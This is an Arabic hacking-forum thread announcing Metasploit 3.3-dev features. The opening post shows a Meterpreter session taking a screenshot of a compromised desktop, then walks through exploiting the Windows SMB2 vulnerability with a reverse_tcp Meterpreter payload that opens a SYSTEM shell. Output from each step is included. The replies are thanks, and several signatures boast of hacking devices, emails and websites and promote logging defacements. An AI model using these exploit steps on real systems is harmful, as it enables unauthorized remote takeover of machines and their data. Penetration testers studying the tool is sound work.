التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 11

الموضوع: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

  1. #1
    :: مشرف عام :: Aljyyosh Team الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    Hasri التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev



    تحية لكم ياأعضاء منتديات جيوش الهكر ، اليوم حبيت اعرضلكم بعض التطورات في مشروع الميتاسبلويت ، فبعد اجراء العديد من التطويرات على مشروع ميتا سبلويت منذ الاصدار 3.2 أعلن H.D Moore المطوّر الرئيسي لمشروع الثغرات ميتا سبلويت بتدوينة كتبها بتاريخ البارحة عن بعض الميزات والثغرات الجديدة التي تم تطويرها بالاضافة لتوفير الاصدار 3.3-dev من ميتا سبلويت بشكل حزمة مضغوطة ليتم تحميلها من موقع المشروع.


    يعتبر ميتا سبلويت هو مشروع الثغرات الأول في عالم الهاكرز حيث يحتوي ميتا سبلويت على العديد من الثغرات الجهازة للاستغلال عن بعد والتي يتم تحديثها بشكل مستمر بالاضافة للعديد من الأدوات المساعدة التي يستخدمها الهاكرز والـ Penetration Testers في عملهم لتساعدهم على اختبار أمن الشبكة وحماية الأجهزة الموجودة فيها من الثغرات.

    من الأمور التي تم الانتهاء من تطويرها هي اضافة امكانية أخذ صورة لسطح مكتب الجهاز الذي تم اختراقه عن طريق استغلال Meterpreter وذلك كما وضّح HDM:


    كود:
    meterpreter > ps
    
    Process list
    ============
    PID Name Path
    --- ---- ----
    204 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
    [ snipped ]
    1736 Explorer.EXE C:\WINDOWS\Explorer.EXE
    3348 sol.exe C:\WINDOWS\system32\sol.exe
    
    meterpreter > migrate 1736[*] Migrating to 1736...[*] Migration completed successfully.
    
    meterpreter > screenshot /tmp/boom.bmp[*] Image saved to /tmp/boom.bmp
    Opening browser to image.

    اما الأمر الثاني والذي أجده مهم جداً هو توفير استغلال للثغرة التي اكتشفت مسبقاً وأصابت خدمة مشاركة الملفات في نظام ويندوز فيستا و ويندوز سيرفر 2008 وحتى ويندوز 7.

    عندما كتب ذلك الخبر كان الاستغلال عبارة عن Denial of Service فقط مع وجود احتمال لامكانية تطوير الاستغلال ليصبح Remote Code Execution, يبدو أن مطوري مشروع ****sploit والمساهمين فيه تمكّنوا من تحقيق ذلك وأصبحنا قادرين على استغلال الثغرة السابقة لاختراق الأجهزة التي تعمل بنظام ويندوز VISTA SP1 و VISTA SP2 وحتى Windows Server 2008 عن بعد!!


    كود:
    msf> use exploit/windows/smb/smb2_negotiate_func_index
    msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf (exploit/smb2) > set LHOST 192.168.0.136
    msf (exploit/smb2) > set LPORT 5678
    msf (exploit/smb2) > set RHOST 192.168.0.211
    msf (exploit/smb2) > exploit
    [*] Started reverse handler[*] Connecting to the target (192.168.0.211:445)...[*] Sending the exploit packet (854 bytes)...[*] Waiting up to 180 seconds for exploit to trigger...[*] Sending stage (719360 bytes)[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)
    
    meterpreter > sysinfo
    Computer: WIN-UAKGQGDWLX2
    OS : Windows 2008 (Build 6001, Service Pack 1).
    Arch : x86
    ********: en_US
    
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    يمكننا استخدام الأداة الجديدة التي تم اضافتها للمشروع لفحص الأنظمة التي تستخدم خدمة SMB2 لمشاركة الملفات (الاصدار المستخدم في ويندوز فيستا و ويندوز سيرفر 2008) والتي سنجدها بالمسار التالي:


    كود:
    auxiliary/scanner/smb/smb2
    طبعا هذه ليست الميزات الوحيدة التي تم تطويرها واضافتها للمشروع منذ الاصدار 3.2 فيوجد الكثير من الثغرات, الأدوات والميزات الأخرى تم اضافتها للمشروع خلال تطويره في الفترة السابقة. المشروع مازال قيد التطوير ويحتاج مزيد من الوقت حتى يتم اطلاق الاصدار 3.3 بشكل نهائي لكن من الممكن متابعة مجريات تطوير المشروع أو استخدام أداة SVN لتحديثه ومزامنته بشكل مستمر.


    ودمتم سالمين

    I love Yemen




  2. #2

    افتراضي رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

    بصراحة لا أستطيع التعليق على مدى إعجابي بمواضيعك وأسلوبك.
    شرح واضح وكافي ومرفق بالصور والاهم من ذلك أنها حصرية على منتدانا فقط
    يعني بصراحة... كل الإحترام
    واصل وتقبل تحياتي
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  3. #3

    افتراضي رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

    أنت زي الفل والله يبني ربنا يحميك

  4. #4

    افتراضي رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

    مشكوووووووووووووووووووووو ررررررررر
    طلبت من القلم إنه يرسمك. . .رد بكل خجل ‏ما أقدر أخدمك ! سألته ويش السبب ؟قال أنا أعرف أرسم : شجرأرسم : قمرأرسم : زهرأرسم : نهرأرسم : غيمة مطرلكن . !ما أعرف أرسم ملاك على هيئه بشر . . ؟

  5. #5

    افتراضي رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

    جزاك الله خيرا

  6. #6

    افتراضي رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

    يعطيك العافيه ...

  7. #7

    افتراضي رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

    السلام عليكم
    الف شكر وبارك الله فيك

  8. #8

    افتراضي رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

    merciiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii

  9. #9

    افتراضي رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

    مشكور ع الجهد البذول منك يا اخي الكريم
    مراقبا للمنتدى في غياب ... المراقب
    ومشرفنا للمنتدى في غياب ... المشرف
    هذا المنتدى منكم .... واليكم
    نتشرف بخدمتكم
    للتواصل والاستفسار
    على البروفايل


  10. #10

    افتراضي رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

    يسلمؤؤؤؤؤ ..
    إخترآق أجهزة _ إيميلات 100 %
    تشفير _ هيكس _ تلغيم 100 %
    اندكسات _ فرونت بيج 100 %
    إختراق مواقــع 30 %

    #
    تم إعتـزال إختراق الأجهزة والتشفير

    twitter : Ss_pc3

صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. مجموعة من الثغرات الجديدة
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 188
    آخر مشاركة: 12-28-2012, 11:54 PM
  2. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 115
    آخر مشاركة: 12-21-2012, 11:58 PM
  3. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 2 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 28
    آخر مشاركة: 10-02-2012, 10:03 PM
  4. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 14
    آخر مشاركة: 11-24-2011, 04:34 PM
  5. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 3 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 16
    آخر مشاركة: 11-24-2011, 03:49 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •